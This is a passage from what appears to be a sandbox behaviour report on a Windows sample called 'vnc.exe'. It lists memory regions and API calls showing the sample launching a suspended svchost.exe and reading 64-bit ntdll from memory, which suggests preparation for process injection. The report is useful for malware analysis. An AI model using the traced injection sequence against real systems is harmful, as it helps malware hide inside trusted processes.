entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 628 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 629 start_va = 0x7fff0000 end_va = 0x7ffb28afffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 630 start_va = 0x7ffb28b00000 end_va = 0x7ffb28cc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 631 start_va = 0x7ffb28cc1000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffb28cc1000" filename = "" Region: id = 633 start_va = 0x1b0000 end_va = 0x1b1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 635 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004e0000" filename = "" Region: id = 636 start_va = 0x657b0000 end_va = 0x65829fff monitored = 0 entry_point = 0x657c3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 637 start_va = 0x65840000 end_va = 0x6588ffff monitored = 0 entry_point = 0x65858180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 638 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 639 start_va = 0x65830000 end_va = 0x65837fff monitored = 0 entry_point = 0x658317c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 640 start_va = 0x4f0000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 641 start_va = 0x74650000 end_va = 0x7472ffff monitored = 0 entry_point = 0x74663980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 642 start_va = 0x75e80000 end_va = 0x75ffdfff monitored = 0 entry_point = 0x75f31b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 643 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 644 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 645 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 646 start_va = 0x74570000 end_va = 0x74601fff monitored = 0 entry_point = 0x745b0380 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 647 start_va = 0x7fb00000 end_va = 0x7fea0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sysmain.sdb" filename = "\\Windows\\AppPatch\\sysmain.sdb" (normalized: "c:\\windows\\apppatch\\sysmain.sdb") Region: id = 648 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 649 start_va = 0x75790000 end_va = 0x757d4fff monitored = 0 entry_point = 0x757ade90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 650 start_va = 0x75680000 end_va = 0x7573dfff monitored = 0 entry_point = 0x756b5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 651 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 652 start_va = 0x4f0000 end_va = 0x5effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 653 start_va = 0x610000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000610000" filename = "" Region: id = 654 start_va = 0x754b0000 end_va = 0x7566cfff monitored = 0 entry_point = 0x75592a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 655 start_va = 0x74b50000 end_va = 0x74bfcfff monitored = 0 entry_point = 0x74b64f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 656 start_va = 0x74620000 end_va = 0x7463dfff monitored = 0 entry_point = 0x7462b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 657 start_va = 0x74610000 end_va = 0x74619fff monitored = 0 entry_point = 0x74612a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 658 start_va = 0x74730000 end_va = 0x74787fff monitored = 0 entry_point = 0x747725c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 659 start_va = 0x75740000 end_va = 0x75783fff monitored = 0 entry_point = 0x75759d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 660 start_va = 0x758f0000 end_va = 0x75a3efff monitored = 0 entry_point = 0x759a6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 661 start_va = 0x74790000 end_va = 0x748d6fff monitored = 0 entry_point = 0x747a1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 662 start_va = 0x75670000 end_va = 0x75675fff monitored = 0 entry_point = 0x75671460 region_type = mapped_file name = "psapi.dll" filename = "\\Windows\\SysWOW64\\psapi.dll" (normalized: "c:\\windows\\syswow64\\psapi.dll") Region: id = 663 start_va = 0x76370000 end_va = 0x7776efff monitored = 0 entry_point = 0x7652b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 664 start_va = 0x75300000 end_va = 0x75336fff monitored = 0 entry_point = 0x75303b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 665 start_va = 0x74c60000 end_va = 0x75158fff monitored = 0 entry_point = 0x74e67610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 666 start_va = 0x77820000 end_va = 0x7789afff monitored = 0 entry_point = 0x7783e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 667 start_va = 0x757e0000 end_va = 0x757ebfff monitored = 0 entry_point = 0x757e3930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 668 start_va = 0x748e0000 end_va = 0x7496cfff monitored = 0 entry_point = 0x74929b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 669 start_va = 0x77770000 end_va = 0x777b3fff monitored = 0 entry_point = 0x77777410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 670 start_va = 0x757f0000 end_va = 0x757fefff monitored = 0 entry_point = 0x757f2e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 671 start_va = 0x710000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000710000" filename = "" Region: id = 672 start_va = 0x710000 end_va = 0x739fff monitored = 0 entry_point = 0x715680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 673 start_va = 0x760000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000760000" filename = "" Region: id = 674 start_va = 0x770000 end_va = 0x8f7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000770000" filename = "" Region: id = 675 start_va = 0x75e50000 end_va = 0x75e7afff monitored = 0 entry_point = 0x75e55680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 676 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 677 start_va = 0x4c0000 end_va = 0x4c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 678 start_va = 0x900000 end_va = 0xa80fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000900000" filename = "" Region: id = 679 start_va = 0xdb0000 end_va = 0x21affff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000db0000" filename = "" Region: id = 706 start_va = 0x4d0000 end_va = 0x4d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 752 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 753 start_va = 0x21b0000 end_va = 0x24e6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 754 start_va = 0xa90000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 758 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 760 start_va = 0xa90000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 779 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 780 start_va = 0xa90000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 786 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 787 start_va = 0xa90000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 801 start_va = 0xa90000 end_va = 0xb2bfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a90000" filename = "" Region: id = 803 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 804 start_va = 0xb30000 end_va = 0xcf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 821 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 822 start_va = 0xb30000 end_va = 0xcf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 825 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 826 start_va = 0xb30000 end_va = 0xcf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 835 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 836 start_va = 0xa90000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 841 start_va = 0x5f0000 end_va = 0x5f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 842 start_va = 0xa90000 end_va = 0xc50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Thread: id = 8 os_tid = 0xbe4 [0129.398] GetModuleHandleA (lpModuleName=0x0) returned 0xd40000 [0129.400] GetModuleHandleA (lpModuleName=0x0) returned 0xd40000 [0129.400] GetVersion () returned 0x23f00206 [0129.400] GetCurrentProcessId () returned 0xaf4 [0129.401] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0129.401] GetProcAddress (hModule=0x74650000, lpProcName="IsWow64Process") returned 0x74669f10 [0129.401] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xaf4) returned 0x168 [0129.401] IsWow64Process (in: hProcess=0x168, Wow64Process=0x19f8c8 | out: Wow64Process=0x19f8c8*=1) returned 1 [0129.721] CloseHandle (hObject=0x168) returned 1 [0129.721] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74650000 [0129.721] GetProcAddress (hModule=0x74650000, lpProcName="Wow64EnableWow64FsRedirection") returned 0x7468b4f0 [0129.721] Wow64EnableWow64FsRedirection (Wow64FsEnableRedirection=0) returned 1 [0129.724] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x19f968 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0129.728] PathCombineW (in: pszDest=0x19fb70, pszDir="C:\\Windows\\system32", pszFile="svchost.exe -k" | out: pszDest="C:\\Windows\\system32\\svchost.exe -k") returned="C:\\Windows\\system32\\svchost.exe -k" [0129.728] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="C:\\Windows\\system32\\svchost.exe -k", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19f924*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x19f914 | out: lpCommandLine="C:\\Windows\\system32\\svchost.exe -k", lpProcessInformation=0x19f914*(hProcess=0x174, hThread=0x16c, dwProcessId=0x2f8, dwThreadId=0xba0)) returned 1 [0130.806] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2f8) returned 0x17c [0130.806] IsWow64Process (in: hProcess=0x17c, Wow64Process=0x19f5d4 | out: Wow64Process=0x19f5d4*=0) returned 1 [0130.806] CloseHandle (hObject=0x17c) returned 1 [0130.806] GetCurrentProcessId () returned 0xaf4 [0130.806] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xaf4) returned 0x17c [0130.807] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0130.807] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0130.807] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x17c, ProcessInformationClass=0x0, ProcessInformation64=0x19efb8, ProcessInformationLength=0x30, ReturnLength=0x19f010 | out: ProcessInformation64=0x19efb8, ReturnLength=0x19f010) returned 0x0 [0130.807] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0130.807] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0130.808] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0130.808] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64ReadVirtualMemory64") returned 0x77968950 [0130.808] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x380000, Buffer=0x0, BufferSize=0x61df68, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0130.808] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28c45200, Buffer=0x7ffb, BufferSize=0x61df90, NumberOfBytesRead=0x40 | out: Buffer=0x7ffb, NumberOfBytesRead=0x40) returned 0x0 [0130.808] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1c70, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0130.808] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1af0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0130.808] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2110, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0130.808] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e23f0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0130.808] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e25c0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0130.808] LocalFree (hMem=0x629120) returned 0x0 [0130.808] LocalFree (hMem=0x61df68) returned 0x0 [0130.808] VirtualAlloc (lpAddress=0x0, dwSize=0x5a4, flAllocationType=0x3000, flProtect=0x4) returned 0x5f0000 [0130.809] GetModuleHandleW (lpModuleName="NTDLL.DLL") returned 0x778f0000 [0130.809] GetProcAddress (hModule=0x778f0000, lpProcName="ZwWow64QueryInformationProcess64") returned 0x77968930 [0130.809] NtWow64QueryInformationProcess64 (in: ProcessHandle=0x17c, ProcessInformationClass=0x0, ProcessInformation64=0x19efb8, ProcessInformationLength=0x30, ReturnLength=0x19f010 | out: ProcessInformation64=0x19efb8, ReturnLength=0x19f010) returned 0x0 [0130.809] LocalAlloc (uFlags=0x0, uBytes=0x200) returned 0x629120 [0130.809] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x61df68 [0130.809] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x380000, Buffer=0x0, BufferSize=0x61df68, NumberOfBytesRead=0x28 | out: Buffer=0x0, NumberOfBytesRead=0x28) returned 0x0 [0130.809] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28c45200, Buffer=0x7ffb, BufferSize=0x61df90, NumberOfBytesRead=0x40 | out: Buffer=0x7ffb, NumberOfBytesRead=0x40) returned 0x0 [0130.809] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1c70, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0130.809] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e18a8, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x58 | out: Buffer=0x0, NumberOfBytesRead=0x58) returned 0x0 [0130.809] StrRChrA (lpStart="C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\vnc.exe", lpEnd=0x0, wMatch=0x5c) returned="\\vnc.exe" [0130.810] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e1af0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0130.810] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e19f0, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0130.810] StrRChrA (lpStart="C:\\Windows\\SYSTEM32\\ntdll.dll", lpEnd=0x0, wMatch=0x5c) returned="\\ntdll.dll" [0130.810] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2110, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0130.810] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2290, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x3a | out: Buffer=0x0, NumberOfBytesRead=0x3a) returned 0x0 [0130.810] StrRChrA (lpStart="C:\\Windows\\system32\\wow64.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64.dll" [0130.810] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e23f0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0130.810] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2570, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0130.811] StrRChrA (lpStart="C:\\Windows\\system32\\wow64win.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64win.dll" [0130.811] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e25c0, Buffer=0x0, BufferSize=0x61dfd0, NumberOfBytesRead=0x98 | out: Buffer=0x0, NumberOfBytesRead=0x98) returned 0x0 [0130.811] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x4e2090, Buffer=0x0, BufferSize=0x629120, NumberOfBytesRead=0x40 | out: Buffer=0x0, NumberOfBytesRead=0x40) returned 0x0 [0130.811] StrRChrA (lpStart="C:\\Windows\\system32\\wow64cpu.dll", lpEnd=0x0, wMatch=0x5c) returned="\\wow64cpu.dll" [0130.811] LocalFree (hMem=0x629120) returned 0x0 [0130.811] LocalFree (hMem=0x61df68) returned 0x0 [0130.811] lstrcmpiA (lpString1="vnc.exe", lpString2="NTDLL.DLL") returned 1 [0130.816] StrChrA (lpStart="vnc.exe", wMatch=0x2e) returned=".exe" [0130.816] lstrcmpiA (lpString1="vnc", lpString2="NTDLL.DLL") returned 1 [0130.816] lstrcmpiA (lpString1="ntdll.dll", lpString2="NTDLL.DLL") returned 0 [0130.816] VirtualFree (lpAddress=0x5f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0130.816] VirtualAlloc (lpAddress=0x0, dwSize=0x1c1000, flAllocationType=0x3000, flProtect=0x4) returned 0xa90000 [0130.817] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b00000, Buffer=0x7ffb, BufferSize=0xa90000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.817] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b01000, Buffer=0x7ffb, BufferSize=0xa91000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.818] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b02000, Buffer=0x7ffb, BufferSize=0xa92000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.818] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b03000, Buffer=0x7ffb, BufferSize=0xa93000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.818] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b04000, Buffer=0x7ffb, BufferSize=0xa94000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.818] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b05000, Buffer=0x7ffb, BufferSize=0xa95000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.819] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b06000, Buffer=0x7ffb, BufferSize=0xa96000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.819] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b07000, Buffer=0x7ffb, BufferSize=0xa97000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.819] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b08000, Buffer=0x7ffb, BufferSize=0xa98000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.819] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b09000, Buffer=0x7ffb, BufferSize=0xa99000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.819] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0a000, Buffer=0x7ffb, BufferSize=0xa9a000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.819] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0b000, Buffer=0x7ffb, BufferSize=0xa9b000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.820] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0c000, Buffer=0x7ffb, BufferSize=0xa9c000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.820] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0d000, Buffer=0x7ffb, BufferSize=0xa9d000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.820] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0e000, Buffer=0x7ffb, BufferSize=0xa9e000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.820] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b0f000, Buffer=0x7ffb, BufferSize=0xa9f000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.821] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b10000, Buffer=0x7ffb, BufferSize=0xaa0000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.821] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b11000, Buffer=0x7ffb, BufferSize=0xaa1000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.821] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b12000, Buffer=0x7ffb, BufferSize=0xaa2000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 0x0 [0130.821] NtWow64ReadVirtualMemory64 (in: ProcessHandle=0x17c, BaseAddress=0x28b13000, Buffer=0x7ffb, BufferSize=0xaa3000, NumberOfBytesRead=0x1000 | out: Buffer=0x7ffb, NumberOfBytesRead=0x1000) returned 